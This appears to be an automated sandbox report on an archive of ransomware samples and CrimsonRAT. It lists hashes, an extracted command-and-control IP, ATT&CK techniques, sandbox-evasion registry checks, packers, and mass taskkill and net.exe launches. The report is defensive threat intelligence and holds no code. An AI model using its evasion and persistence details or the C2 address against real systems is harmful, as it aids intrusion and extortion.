crimsonrat | a1941a5b8cdbf7cd067ee8c9005c6d8ee3b83c5b6aa8d11328596488ca158c84

Analysis

max time kernel
59s
max time network
78s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
31-10-2024 20:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00398.7z
Size

35.6MB
MD5

3b49730191d772ce76f948b1df95b031
SHA1

7d52bb20e716d41b4dcaa71d76b23425a6dfd260
SHA256

a1941a5b8cdbf7cd067ee8c9005c6d8ee3b83c5b6aa8d11328596488ca158c84
SHA512

19b7f11784844562eff25c2d68e9a44ab071d064ce15ebe86592d918bcc3eb55a0c584d345842a7f5357914beb8d39d726528f9d79f2773bfebf86726caf640f
SSDEEP

786432:2x/uG7WdVIu/Dwno4l2xVPtp+yxk3DX2m99a73uw2HK13W2n:2x/XUIu/DSUxVP7+yGam907+RHK9

Score

10^/10

crimsonrat agilenet discovery evasion execution rat themida upx vmprotect

Malware Config

Extracted

Family

crimsonrat

66.154.113.38

Signatures

CrimsonRAT main payload 1 IoCs

Processes:

resource	yara_rule
C:\ProgramData\Dhonvdh\ithmrdrvas.exe	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat
Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe

Drops startup file 1 IoCs

Processes:

HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe

Executes dropped EXE 5 IoCs

Processes:

HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exeHEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exeHEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe

pid	process
4308	HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe
3580	HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe
2912	HEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exe
4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe
3952	HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe

Loads dropped DLL 1 IoCs

Processes:

HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe

pid process

4308 HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

7268 icacls.exe
7260 icacls.exe
7252 icacls.exe

pid	process
7268	icacls.exe
7260	icacls.exe
7252	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe	agile_net

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\00398\VHO-Trojan-Ransom.Win32.Encoder.gen-c7de7b5d38f057c98ecf3d3836d9620e6dacac6f42a4ad28a3c9bb24e8942e96.exe	themida
C:\Users\Admin\Desktop\00398\VHO-Trojan-Ransom.Win32.Encoder.gen-c2b12d32b881483fa92e01f327950ddfd95bb6633e3f722076e4eb2e5f12e164.exe	themida

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Cryptodef.agcb-4ceda276c1fd39149c23c16990e1aaf3d4e109993d6404f247f0b4919bb39cc0.exe	vmprotect

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\00398\UDS-Trojan-Ransom.Win32.Encoder-c787c02fb6d846ba19b9b0d2413d613b463ea98b8baedefe97e9871ae9b99232.exe	upx
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Crypmod.abtq-fd1096cb5bedfa8eb0bc020ec86133c26e2f3476d7d90ad4ff768352ce5c1e64.exe	upx

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

6828 sc.exe
6820 sc.exe
6812 sc.exe
6804 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
6828	sc.exe
6820	sc.exe
6812	sc.exe
6804	sc.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exeHEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Kills process with taskkill 47 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
7184	taskkill.exe
544	taskkill.exe
7124	taskkill.exe
7020	taskkill.exe
6924	taskkill.exe
6916	taskkill.exe
6900	taskkill.exe
7192	taskkill.exe
6868	taskkill.exe
6876	taskkill.exe
7100	taskkill.exe
7084	taskkill.exe
6956	taskkill.exe
6936	taskkill.exe
6908	taskkill.exe
1496	taskkill.exe
7076	taskkill.exe
7048	taskkill.exe
7036	taskkill.exe
6844	taskkill.exe
5160	taskkill.exe
6884	taskkill.exe
6836	taskkill.exe
7108	taskkill.exe
7132	taskkill.exe
7116	taskkill.exe
7028	taskkill.exe
7012	taskkill.exe
6980	taskkill.exe
6944	taskkill.exe
7144	taskkill.exe
7200	taskkill.exe
7164	taskkill.exe
7092	taskkill.exe
6996	taskkill.exe
6860	taskkill.exe
7208	taskkill.exe
6892	taskkill.exe
7152	taskkill.exe
7068	taskkill.exe
7056	taskkill.exe
7004	taskkill.exe
6988	taskkill.exe
6972	taskkill.exe
6964	taskkill.exe
6852	taskkill.exe
7176	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exetaskmgr.exepowershell.exe

pid	process
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
1468	powershell.exe
1468	powershell.exe
1468	powershell.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

7zFM.exetaskmgr.exe

pid process

552 7zFM.exe
4540 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

7zFM.exetaskmgr.exetaskmgr.exepowershell.exeHEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe

description	pid	process
Token: SeRestorePrivilege	552	7zFM.exe
Token: 35	552	7zFM.exe
Token: SeSecurityPrivilege	552	7zFM.exe
Token: SeDebugPrivilege	1552	taskmgr.exe
Token: SeSystemProfilePrivilege	1552	taskmgr.exe
Token: SeCreateGlobalPrivilege	1552	taskmgr.exe
Token: SeDebugPrivilege	4540	taskmgr.exe
Token: SeSystemProfilePrivilege	4540	taskmgr.exe
Token: SeCreateGlobalPrivilege	4540	taskmgr.exe
Token: 33	1552	taskmgr.exe
Token: SeIncBasePriorityPrivilege	1552	taskmgr.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

7zFM.exetaskmgr.exetaskmgr.exe

pid	process
552	7zFM.exe
552	7zFM.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exetaskmgr.exe

pid	process
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
1552	taskmgr.exe
1552	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe
4540	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

taskmgr.exepowershell.execmd.exeHEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe

description	pid	process	target process
PID 1552 wrote to memory of 4540	1552	taskmgr.exe	taskmgr.exe
PID 1552 wrote to memory of 4540	1552	taskmgr.exe	taskmgr.exe
PID 1468 wrote to memory of 2244	1468	powershell.exe	cmd.exe
PID 1468 wrote to memory of 2244	1468	powershell.exe	cmd.exe
PID 2244 wrote to memory of 4308	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe
PID 2244 wrote to memory of 4308	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe
PID 2244 wrote to memory of 3580	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe
PID 2244 wrote to memory of 3580	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe
PID 2244 wrote to memory of 3580	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe
PID 2244 wrote to memory of 2912	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exe
PID 2244 wrote to memory of 2912	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exe
PID 2244 wrote to memory of 4884	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe
PID 2244 wrote to memory of 4884	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe
PID 2244 wrote to memory of 4884	2244	cmd.exe	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe
PID 2244 wrote to memory of 3952	2244	cmd.exe	HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe
PID 2244 wrote to memory of 3952	2244	cmd.exe	HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe
PID 2244 wrote to memory of 3952	2244	cmd.exe	HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe
PID 4884 wrote to memory of 1876	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	cmd.exe
PID 4884 wrote to memory of 1876	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	cmd.exe
PID 4884 wrote to memory of 1876	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	cmd.exe
PID 4884 wrote to memory of 4312	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4312	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4312	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4952	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4952	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4952	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4172	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4172	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4172	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 3356	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 3356	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 3356	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4608	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4608	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4608	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 3144	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 3144	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 3144	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 1464	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 1464	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 1464	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 2856	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 2856	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 2856	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 5092	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 5092	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 5092	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4336	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4336	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4336	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4776	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4776	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4776	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 3812	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 3812	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 3812	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4748	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4748	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4748	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 1732	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 1732	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 1732	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4552	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe
PID 4884 wrote to memory of 4552	4884	HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe	net.exe

C:\Program Files\7-Zip\7zFM.exe
